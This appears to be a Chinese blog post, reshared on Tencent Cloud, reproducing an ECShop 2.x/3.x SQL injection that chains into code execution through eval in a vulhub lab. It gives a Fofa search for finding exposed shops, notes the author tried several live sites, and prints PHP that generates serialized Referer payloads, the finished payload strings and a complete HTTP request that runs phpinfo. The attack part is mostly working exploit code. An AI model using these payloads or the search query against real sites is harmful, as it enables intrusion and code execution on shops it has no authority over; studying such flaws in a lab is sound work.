首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >ecshop 2.x/3.x sql注入/任意代码执行漏洞

ecshop 2.x/3.x sql注入/任意代码执行漏洞

作者头像
网e渗透安全部
发布于 2022-12-01 06:48:44
发布于 2022-12-01 06:48:44
1.4K05
代码可运行
举报
文章被收录于专栏:白安全组白安全组
运行总次数:5
代码可运行

前言:

该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二次漏洞”,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了任意代码执行。

值得一提的是攻击者利用的payload只适用于ECShop 2.x版本导致有部分安全分析者认为该漏洞不影响ECShop 3.x,这个是因为在3.x的版本里有引入防注入攻击的安全代码,通过我们分析发现该防御代码完全可以绕过实现对ECShop 3.x的攻击。

Fofa语法:

body="ECSHOP v2.7.3"

Fofa可以搜到的也不少,但是这个版本大多被修复,我尝试了几个无果之后就放弃了。

环境搭建:

基于vulhub靶场搭建,启动目录:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
vulhub-master/ecshop/xianzhi-2017-02-82239600/

启动命令:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
docker-compose up -d

启动后访问

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
你的ip:8080

即可

根据指示安装一下即可

下面的全是绿色就下一步

这里数据库主机如下图,用户名和密码都是root,其余随便写

正文:

根据漏洞文档说的,下面的代码可以生成两个poc

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$arr = [
"num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
"id" => $id
];

$s = serialize($arr);

$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";
?>

需要用phpstudy打开后自动生成,我懒得搭建,就找了网上生成好的直接复制使用

一个是2.x的:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Referer:554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

一个是3.x的:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Referer:45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

拿到这两个poc之后,我们访问搭建的用户登录界面,打开burp,刷新登录页面,然后发送到重发器,插入poc到Referer位置

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
GET /user.php HTTP/1.1
Host: 192.168.43.111:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer:554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
Cookie:PHPSESSID=99b122d847272471b5f276f13b50f4ec; ECS_ID=5ae93da21179d5ab2c98dcc4979e163169fbe55b; ECS[visit_times]=2; ECS[display]=grid; ECSCP_ID=8c4d85f5cf208b861f6f085853dbbacb3603b6f4
Upgrade-Insecure-Requests: 1

点击send发送

我们看到代码执行后,出现了phpinfo页面,证明注入成功了。3.x实现方式同上。

交流群:70844080

公众号:白安全组

作者:【白】

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-07-30,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 白安全组 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
ECShop全系列版本远程代码执行漏洞复现
问题发生在user.php的display函数,模版变量可控,导致注入,配合注入可达到远程代码执行
伍尚国
2018/09/11
3.4K0
ECShop全系列版本远程代码执行漏洞复现
ecshop全系列SQL注入漏洞分析
ecshop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。最新版本为3.6.0。而最近ecshop爆出存在SQL注入漏洞,且能影响至所有系列。本文就对该SQL注入漏洞的成因做简单的分析
美创科技
2023/05/04
2.7K0
ecshop全系列SQL注入漏洞分析
ecshop 漏洞如何修复 补丁升级与安全修复详情
目前ecshop漏洞大面积爆发,包括最新版的ecshop 3.0,ecshop 4.0,ecshop2.7.3全系列版本都存在着高危网站漏洞,导致网站被黑,被篡改,被挂马,许多商城系统深受其漏洞的攻击,给商城的运营者以及网站运营者带来很大的经济损失,甚至有些ecshop还被跳转到了一些恶意网站上去。那么ecshop漏洞如何修复呢?
网站安全专家
2019/07/24
2.5K0
ecshop 漏洞如何修复 补丁升级与安全修复详情
Typecho 前台 getshell 漏洞分析
Typecho是一个简单,轻巧的博客程序。基于PHP,使用多种数据库(Mysql,PostgreSQL,SQLite)储存数据。在GPL Version 2许可证下发行,是一个开源的程序,目前使用SVN来做版本管理。
Seebug漏洞平台
2018/03/13
1.6K0
Typecho 前台 getshell 漏洞分析
柠檬鸭组织样本分析
•设置防火墙规则,转发65532、65531、65529的请求到1.1.1.1•创建计划任务定时启动•写入批处理检测cmd.exe进程•如果cmd.exe进程数量大于10则重启机器
HACK学习
2021/02/01
3.4K0
sublime text _注册码
打开 Sublime Text 3 的 “Help”–“Enter Licence”,然后根据版本选择输入下面的注册码。
shirayner
2018/08/10
3.7K0
【干货】HW2023POC收集
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他违法行为!!!
释然IT杂谈
2023/08/18
9290
【干货】HW2023POC收集
Discuz!X ≤3.4 任意文件删除漏洞分析
Discuz!X社区软件,是一个采用 PHP 和 MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。
Seebug漏洞平台
2018/03/09
1.6K0
Discuz!X ≤3.4 任意文件删除漏洞分析
Github-ThinkPHP 2.X 任意代码执行
ThinkPHP 3.0 版本因为 Lite 模式下没有修复该漏洞,也存在这个漏洞。所以先来看看preg_replace这个函数,这个函数是个替换函数,而且支持正则,使用方式如下:
Baige
2022/03/22
9690
Github-ThinkPHP 2.X 任意代码执行
Tronapi-波场开发的TRC20-API-附接口文档-基于ThinkPHP5封装
目前已经基于这套api开发出来归集系统,靓号生成系统开发环境要求重要的几点提醒下:1.php7.3或者7.42.安装gmp扩展,否则转账不成功3.配置项目伪静态4.运行目录为public5.合约地址不需要动,切记别改6.ThinkPHP5基本运行要求,这个不需要额外多说------------简要描述生成地址接口请求URLhttp://xx.com/api/trc20/generateAddress请求方式GET 返回示例{ "code": 1, "data": { "privat
Tronapi技术支持
2022/07/11
12.1K4
Tronapi-波场开发的TRC20-API-附接口文档-基于ThinkPHP5封装
Blockmeta api v2使用教程
The API provides you with a convenient, powerful and simple way to read data from the bytom network and build your own services with it. The API allows to use the real-time analytical data about bytom blockchain transactions, addresses and assets. Below is the list of APIs, 1 request per second. Please do not exceed the limits or you'll be banned. If you have specific needs, please let us know, we are ready to help you.
比原链Bytom
2019/06/21
2K0
Blockmeta api v2使用教程
部署一个私链以太坊的智能合约
部署智能合约的步骤为: 启动一个以太坊节点 (例如geth或者testrpc)。 使用solc编译智能合约。 => 获得二进制代码。 将编译好的合约部署到网络。(这一步会消耗以太币,还需要使用你的节点
rectinajh
2018/05/17
2.4K0
用Yara对红队工具“打标”
YARA 通常是帮助恶意软件研究人员识别和分类恶意软件样本的工具,它基于文本或二进制模式创建恶意样本的描述规则,每个规则由一组字符串和一个布尔表达式组成,这些表达式决定了它的逻辑。
红队蓝军
2023/08/02
6850
用Yara对红队工具“打标”
用友GRP-U8SQL注入&远程代码执行漏洞复现
用友GRP-U8行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。用友GRP-u8被曝存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有限制外部实体的加载,导致可加载恶意外部文件,可以执行SQL语句,甚至可以执行系统命令。
用户6343818
2021/07/08
3.9K0
用友GRP-U8SQL注入&远程代码执行漏洞复现
DDCTF WriteUp (MISC+Web)
看公告: DDCTF{return DDCTF::get(2019)->flagOf(0);}
ChaMd5安全团队
2019/05/07
1.9K0
DDCTF WriteUp (MISC+Web)
如何将PancakeSwap部署到以太坊类链上
因为PancakeFactory和PancakeRouter的合约代码是好几个文件,我们把它们合并成一个方便部署,都放到 build 目录下
Tiny熊
2021/09/23
3K0
代码审计| 这是一款适合练手的漏洞
0x00 背景 本周,斗哥分析了下zzcms8.2的源码,发现蛮多问题的,觉得这个源码适合萌新们练手或入坑PHP的代码审计。今天决定发出一些发现的问题,当然这个源码还有很多问题,本篇仅对部分漏洞进行分析,至于如何GetShell我会在下周分享出我的方法。期待与师傅们的交流讨论。 0x01 审计过程 XSS相关问题 0x00 相关环境 源码信息:ZZCMS 8.2 问题文件: \zzcms\zzcms8.2\install\step_6.php 漏洞类型:反射型XSS 站点地址:http://www.z
漏斗社区
2018/03/28
1.2K0
代码审计| 这是一款适合练手的漏洞
TP-LINK 远程代码执行漏洞 CVE-2017-13772 趣谈
原文地址:《A CURIOUS TALE OF REMOTE CODE EXECUTION, THE TP-LINK STORY – CVE-2017-13772》
Seebug漏洞平台
2018/03/15
4.2K0
TP-LINK 远程代码执行漏洞 CVE-2017-13772 趣谈
用SV写一个蒙哥马利模乘的参考模型
往期推送过一个蒙哥马利算法的介绍,如果要实现蒙哥马利模乘的硬件模块,那么一个参考模型是必不可少的,这一期将利用SV实现一个简单的参考模型,这个参考模型可以直接用于功能仿真
空白的贝塔
2020/06/24
7480
Microsoft Windows CVE-2017-8710 XXE Information Disclosure 漏洞分析
Microsoft的管理控制台没有正确地处理XML的外部实体引用导致可以信息泄露,下载目标机器的文件
用户1423082
2024/12/31
1460
Microsoft Windows CVE-2017-8710 XXE Information Disclosure 漏洞分析
相关推荐
ECShop全系列版本远程代码执行漏洞复现
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档